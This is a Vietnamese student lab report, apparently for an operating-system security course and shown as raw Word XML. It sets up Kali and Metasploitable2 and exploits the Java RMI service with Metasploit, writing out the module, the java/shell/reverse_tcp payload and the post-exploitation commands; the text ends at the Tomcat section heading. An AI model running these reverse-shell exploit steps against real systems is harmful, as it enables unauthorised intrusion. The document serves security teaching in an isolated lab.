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7D042" w14:textId="286B284E" w:rsidR="007C5E17" w:rsidRDefault="007C5E1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C5E17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>An toàn HĐH (INT1484) - Bài thực hành số 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F60164" w14:textId="413040C2" w:rsidR="007C5E17" w:rsidRPr="003E49F2" w:rsidRDefault="007C5E1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C5E17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Đinh Quang Hiếu – </w:t>
      </w:r>
      <w:r w:rsidRPr="003E49F2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>B19DCAT065</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159206C0" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRPr="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17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591B2975" w14:textId="02125D4D" w:rsidR="007C5E17" w:rsidRPr="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17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7C5E17">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Nội dung thực hành </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7791FE27" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRPr="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17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7C5E17">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.1 Cài đặt các công cụ, nền tảng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D02544" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRPr="005B2CD4" w:rsidRDefault="007C5E17" w:rsidP="007C5E17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5B2CD4">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Cài đặt Kali Linux (nếu chưa cài đặt) trên 1 máy ảo (hoặc máy thực)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A32685C" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2CD4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A474B7B" wp14:editId="1C27B78E">
            <wp:extent cx="5731510" cy="275018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7647" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19F84801" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRPr="005B2CD4" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B2CD4">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Đổi tên máy Kali Linux thành dạng Mã SV-Tên-Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EF0968" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4148B9B7" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A172FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AB97E74" wp14:editId="793506FF">
            <wp:extent cx="5731510" cy="264096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80A4" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D98E147" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D07487F" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRPr="00A172FA" w:rsidRDefault="007C5E17" w:rsidP="007C5E17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A172FA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kiểm tra và chạy thử bộ công cụ tấn công MetaSploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B74F299" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="108BB5D8" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A172FA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="025A6332" wp14:editId="609C20B2">
            <wp:extent cx="5731510" cy="399986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E646" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRPr="00A172FA" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B4DFE38" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRPr="00400ADF" w:rsidRDefault="007C5E17" w:rsidP="007C5E17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A172FA">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Tải và cài đặt Metasploitable2 làm máy victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1E8EAC" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61543EA4" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRPr="00400ADF" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400ADF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="609F3AF6" wp14:editId="57A5C83B">
            <wp:extent cx="5731510" cy="285496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F177" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRPr="00A172FA" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="648364E7" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRPr="00400ADF" w:rsidRDefault="007C5E17" w:rsidP="007C5E17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400ADF">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tạo một người dùng mới trên máy ảo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC2E9BB" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="138D6F6C" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRPr="00400ADF" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002857CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DFF699C" wp14:editId="1A8347E9">
            <wp:extent cx="5731510" cy="367538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3676" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRPr="002857CF" w:rsidRDefault="007C5E17" w:rsidP="007C5E17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400ADF">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Đặt lại tên máy chứa lỗi là Mã SV+Họ và tên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544E177F" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52E839AE" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0699">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="396A7F00" wp14:editId="4596F62C">
            <wp:extent cx="5731510" cy="303720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9A2F" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F9CCBF9" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CE190A0" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRPr="007E41DA" w:rsidRDefault="007C5E17" w:rsidP="007C5E17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7E41DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.2 Tìm địa chỉ máy victim Metasploitable2 và Kali và đảm bảo có kết nối</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2911A891" w14:textId="72ADB40F" w:rsidR="007C5E17" w:rsidRPr="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E1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6"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C5E17">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tìm địa chỉ IP của máy victim, kali:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257C8092" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17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 w:rsidRPr="006F0699">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345D15DD" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRPr="008F0B9C" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F0B9C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B6EC149" wp14:editId="72F9FC69">
            <wp:extent cx="5502117" cy="3962743"/>
            <wp:effectExtent l="0" t="0" r="381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9B4B" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRPr="006F0699" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E7E8E8C" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17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Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682F65E7" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRPr="006F0699" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D652EF9" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F0699">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B5541C0" wp14:editId="10C85B76">
            <wp:extent cx="5731510" cy="337121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016A" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CEB1C31" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12A57818" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRPr="008F0B9C" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F0B9C">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Kiểm tra kết nối mạng giữa các máy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE098" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17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Kali đến Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30412A0B" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EF6C787" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F0B9C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71698951" wp14:editId="78C5E541">
            <wp:extent cx="4458086" cy="2362405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7695" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C3F2B97" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E780443" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Victim đến Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D487854" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="303CD6E7" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F0B9C">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AF8E021" wp14:editId="18BB3306">
            <wp:extent cx="5464013" cy="2217612"/>
            <wp:effectExtent l="0" t="0" r="3810" b="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3216" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRDefault="007C5E17" w:rsidP="007C5E17">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C153CED" w14:textId="77777777" w:rsidR="007C5E17" w:rsidRPr="007C5E17" w:rsidRDefault="007C5E17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4985497C" w14:textId="706D5F8E" w:rsidR="00F83532" w:rsidRPr="003E49F2" w:rsidRDefault="003B652F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3E49F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.3 Khai thác lỗ hổng sử dụng cấu hình ngầm định trong trong dịch vụ Java RMI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1C00D6" w14:textId="6F58C178" w:rsidR="003B652F" w:rsidRPr="004F4242" w:rsidRDefault="003B652F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>-Khởi động Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D8A2C8" w14:textId="19E98CF4" w:rsidR="003B652F" w:rsidRPr="004F4242" w:rsidRDefault="003B652F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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> - Khai báo sử dụng mô đun tấn công: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F290F4E" w14:textId="0432B865" w:rsidR="003B652F" w:rsidRPr="004F4242" w:rsidRDefault="003B652F" w:rsidP="003B652F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 xml:space="preserve">use exploit/multi/misc/java_rmi_server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B67AD45" w14:textId="78A70F9E" w:rsidR="003B652F" w:rsidRPr="004F4242" w:rsidRDefault="003B652F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C0F2433" wp14:editId="7774A23A">
            <wp:extent cx="4846740" cy="647756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CDF3" w14:textId="69F9C1C2" w:rsidR="003B652F" w:rsidRPr="004F4242" w:rsidRDefault="003B652F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 xml:space="preserve">- Chọn payload cho thực thi (mở shell): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145316ED" w14:textId="2D8B318E" w:rsidR="003B652F" w:rsidRPr="004F4242" w:rsidRDefault="003B652F" w:rsidP="003B652F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 xml:space="preserve"> set payload java/shell/reverse_tcp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05092F35" w14:textId="2C703A0B" w:rsidR="003B652F" w:rsidRPr="004F4242" w:rsidRDefault="003B652F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F4242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DFBB9E0" wp14:editId="2D169F8B">
            <wp:extent cx="5029636" cy="624894"/>
            <wp:effectExtent l="0" t="0" r="0" b="381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82D9" w14:textId="77777777" w:rsidR="003B652F" w:rsidRPr="004F4242" w:rsidRDefault="003B652F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614EDAD5" w14:textId="292E0741" w:rsidR="003B652F" w:rsidRPr="004F4242" w:rsidRDefault="003B652F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 xml:space="preserve">- Đặt địa chỉ IP máy victim: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BCC91D" w14:textId="3D1A4A8B" w:rsidR="003B652F" w:rsidRPr="004F4242" w:rsidRDefault="003B652F" w:rsidP="003B652F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>set RHOST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E113E6" w14:textId="762988BD" w:rsidR="003B652F" w:rsidRPr="004F4242" w:rsidRDefault="003B652F" w:rsidP="003B652F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26FAEF3" wp14:editId="01977686">
            <wp:extent cx="4679085" cy="51820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BA9E" w14:textId="77777777" w:rsidR="003B652F" w:rsidRPr="004F4242" w:rsidRDefault="003B652F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 xml:space="preserve"> - Thực thi tấn công: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F28B799" w14:textId="6EF0DC7B" w:rsidR="003B652F" w:rsidRPr="004F4242" w:rsidRDefault="003B652F" w:rsidP="003B652F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>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7C9EF9" w14:textId="5C731EC0" w:rsidR="003B652F" w:rsidRPr="004F4242" w:rsidRDefault="003B652F" w:rsidP="003B652F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230AF96" wp14:editId="60CCF019">
            <wp:extent cx="5288738" cy="1889924"/>
            <wp:effectExtent l="0" t="0" r="762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819E" w14:textId="1BCC6A62" w:rsidR="00D62D52" w:rsidRPr="004F4242" w:rsidRDefault="00D62D52" w:rsidP="003B652F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C19FF3B" w14:textId="32B9CDCB" w:rsidR="00D62D52" w:rsidRPr="004F4242" w:rsidRDefault="00D62D52" w:rsidP="003B652F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>-Kết nối trở lại phiên (session) đã tạo thành công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D18C16F" w14:textId="0F27CF9A" w:rsidR="00D62D52" w:rsidRPr="004F4242" w:rsidRDefault="00D62D52" w:rsidP="00D62D52">
      <w:pPr>
        <w:ind w:firstLine="720"/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>sessions 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0553F435" w14:textId="00CC3DA5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</w:p>
    <w:p w14:paraId="366592BF" w14:textId="7F130C89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3424505" wp14:editId="5073A1CD">
            <wp:extent cx="2209800" cy="533616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5841" cy="5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0384" w14:textId="2E6748B6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lastRenderedPageBreak/>
        <w:t>-Chạy các lệnh trong phiên khai thác đang mở:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1250C216" w14:textId="77777777" w:rsidR="00D62D52" w:rsidRPr="004F4242" w:rsidRDefault="00D62D52" w:rsidP="00D62D52">
      <w:pPr>
        <w:ind w:left="720"/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>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F328562" w14:textId="77777777" w:rsidR="00D62D52" w:rsidRPr="004F4242" w:rsidRDefault="00D62D52" w:rsidP="00D62D52">
      <w:pPr>
        <w:ind w:left="720"/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>uname -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D4E686" w14:textId="504E8556" w:rsidR="00D62D52" w:rsidRPr="004F4242" w:rsidRDefault="00D62D52" w:rsidP="00D62D52">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4242">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hostnam</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4242">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5E1738" w14:textId="230F3377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F4242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41488D2" wp14:editId="62D1BB66">
            <wp:extent cx="5311600" cy="1417443"/>
            <wp:effectExtent l="0" t="0" r="381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15EE" w14:textId="650EC818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31F1CCF" w14:textId="4B85B476" w:rsidR="00D62D52" w:rsidRPr="003E49F2" w:rsidRDefault="00D62D52" w:rsidP="00D62D52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3E49F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.4 Khai thác lỗi trên Apache Tomcat:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD17E30" w14:textId="77777777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 xml:space="preserve">Khởi động Metasploit </w:t>
      </w:r>
    </w:p>
